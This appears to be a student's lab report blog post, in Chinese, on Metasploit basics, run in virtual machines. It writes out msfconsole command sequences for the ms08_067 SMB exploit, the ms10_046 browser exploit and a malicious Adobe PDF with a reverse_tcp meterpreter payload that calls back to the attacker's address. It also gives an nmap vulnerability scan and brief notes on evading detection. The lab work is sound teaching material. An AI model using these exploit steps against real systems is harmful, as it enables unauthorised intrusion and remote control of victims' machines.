Exp 6 MSF基础

一、实验目标

  本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

  •  一个主动攻击实践,如ms08_067; 
  •  一个针对浏览器的攻击,如ms10_046;
  •  一个针对客户端的攻击,如Adobe;
  •  成功应用任何一个辅助模块。

二、实验内容

Win xp的ip:192.168.1.110(靶机)

kali的ip:192.168.1.108(攻击者)

(一)一个主动攻击实践,如ms08_067

 1.进入/usr/share/metasploit-framework/modules/exploits/windows/smb路径下,查看有哪些可以利用的漏洞(进入exploit渗透攻击模块后,因为靶机是windows,所以继续选择windows,之后可以看到不同协议的漏洞):

选择漏洞ms08_067,其中ms表示微软,08表示年份,067是漏洞编号

2.输入 nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.1.110 查看靶机是否有此漏洞,若是没有此漏洞则可能攻击不成功,所以扫描一下:

确实有此漏洞。(其实我也尝试选择其他漏洞进行扫描,看靶机是否存在,但是除了ms08_067以外,只发现了ms17_10漏洞)

3.输入 use exploit/windows/smb/ms08_067_netapi ,使用针对此漏洞的渗透攻击

 

4.输入 show payloads ,查看可以载荷可以设置为哪些,在这里选择了windows/meterpreter/bind_tcp载荷

5.输入 show options ,查看需要设置哪些选项(比如靶机ip等等),并且根据提示设置靶机ip  set RHOSTS 192.168.1.110 ,设置攻击者ipset LHOSTS 192.168.1.108 等等:

6.输入 show options ,查看是否设置成功:

7.输入 exploit 运行,可以看到攻击成功:

(二)一个针对浏览器的攻击,如ms10_046

 1.查看关于浏览器的漏洞攻击都有哪些

   在这里选择ms10_046漏洞

2.使用针对这个漏洞的攻击,并且根据提示设置信息

 其中,SRVHOST应该填什么呢?根据后面的描述,“The local host to listen on.”意为本地监听的主机,所以应该填的是攻击者的ip(本实验中为192.168.1.108)

3.设置payload为/windows/meterpreter/reverse_tcp,并设置其它信息

 4.在靶机上打开浏览器并输入上图所示URL,在kali 端可获得如下结果:

 5.输入 sessions -i 1 建立会话连接

(三) 一个针对客户端的攻击,如Adobe

1.查看关于客户端的攻击都有哪些

在这里选择adobe_cooltype_sing。

2.输入 use windows/fileformat/adobe_cooltype_sing 使用adobe_cooltype_sing模块,输入 set payload windows/meterpreter/reverse_tcp 设置payload,输入 show options 查看需要设置什么

3.根据提示信息,输入 set LHOST 192.168.1.108 设置攻击者ip,输入 set LPORT 4312 设置端口, set FILENAME adobe.pdf 更改生成的文件名:

 4.输入 exploit 生成文件,并将文件拷贝到靶机中,在kali端参考实验二打开监听,在靶机中用adobe打开此pdf,发现成功回连:

  • 注:windows xp里面没有adobe时,需要下载一个含有此漏洞的adobe,然后用此adobe打开pdf文档。
  •        若是/root目录无权访问,无法取到生成的pdf的话,则可以在shell中使用cp命令将此pdf文件复制到/home目录下,然后再将此文件拷贝到windows xp中。

(四)成功应用任何一个辅助模块(不同于其他同学的实践)

     我随机看了二十几个同学的博客,而且在百度搜索关键词,好像并没有发现有同学使用以下两个辅助模块。

     这个部分以windows 10作为靶机,其ip地址为192.168.1.104

 1.使用/scanner/http/cert

      这个扫描可以用来检查证书是否过期。可以先用 show options 查看需要设置哪些信息,再根据提示设置目标主机或者端口等信息,输入 run 运行此模块,从结果可以看出证书颁发者、发行日期和到期日期等。

 2.使用auxiliary/scanner/smb/pipe_auditor

     这个扫描将确定哪些命名管道可以通过SMB使用。在信息收集时,可以为我们提供有关远程系统上运行的某些服务的一些信息。输入 use auxiliary/scanner/smb/pipe_auditor 进入此模块的使用,输入 show options 查看需要设置哪些信息,输入 set RHOSTS 192.168.1.104/24 设置扫描范围,最后输入 run 运行:(可以发现ip为192.168.1.102的主机的浏览器符合)

三、实验总结

1.实验体会

      感觉此次实验与做过的几次实验相比较来说,虽然也同样遇到了一些问题,但是属于难度较低的。此次实验的目的在于熟悉metasploit的模块和应用,通过这次实验,我也确实对它的应用更加熟悉。因为靶机选的是比较落后的windows xp,还是在没有开防火墙的情况下,所以攻击成功其实挺简单的,但是若是换成windows 10,就没有这么容易了。

2.遇到困难

     实验中遇到一个问题是,单向ping通。kali无法ping通windows xp,但是windows xp却可以ping通kali,在网上搜索了一下说是防火墙的问题,但是其实防火墙一直是关着的,最后想到可能是虚拟机网络设置的原因。可能虚拟机的网络设置不对?比如一个是桥接,一个是nat,这两就不在同一个局域网里。将windows xp的网络设置改为桥接后,发现两个虚拟机可成功ping通。

3.问题回答

(1)用自己的话解释什么是exploit,payload,encode

 :exploit是渗透攻击,payload是载荷,encode是编码。

       从我个人的理解上来说,payload是一段shellcode,是用来实现功能的核心;encode是对payload和nop组装完成的指令序列进行改变,使它尽量不像恶意代码;exploit是攻击的方法,比如利用了什么漏洞,也可以说是攻击的过程。

(2)离实战还缺些什么技术或步骤?

:这次实验选择的靶机是比较落后的windows xp,而且是在没有开防火墙的情况下,进行的实验。但是其实现实生活中,这样的靶机几乎是不存在的。若是想攻击某个靶机,首先得能扫描这个目标机,具有哪些漏洞,方便利用;其次,我怎样给恶意代码改变下包装,或者在不改变功能的前提下改变内里,使它不被目标机发现;最后,还有一个问题是,如果成功进入目标机,应想办法使自己获得更高的权限从而进行更多的操作。

 

 

posted @ 2020-05-02 14:11  zhaiying0000  阅读(165)  评论(1编辑  收藏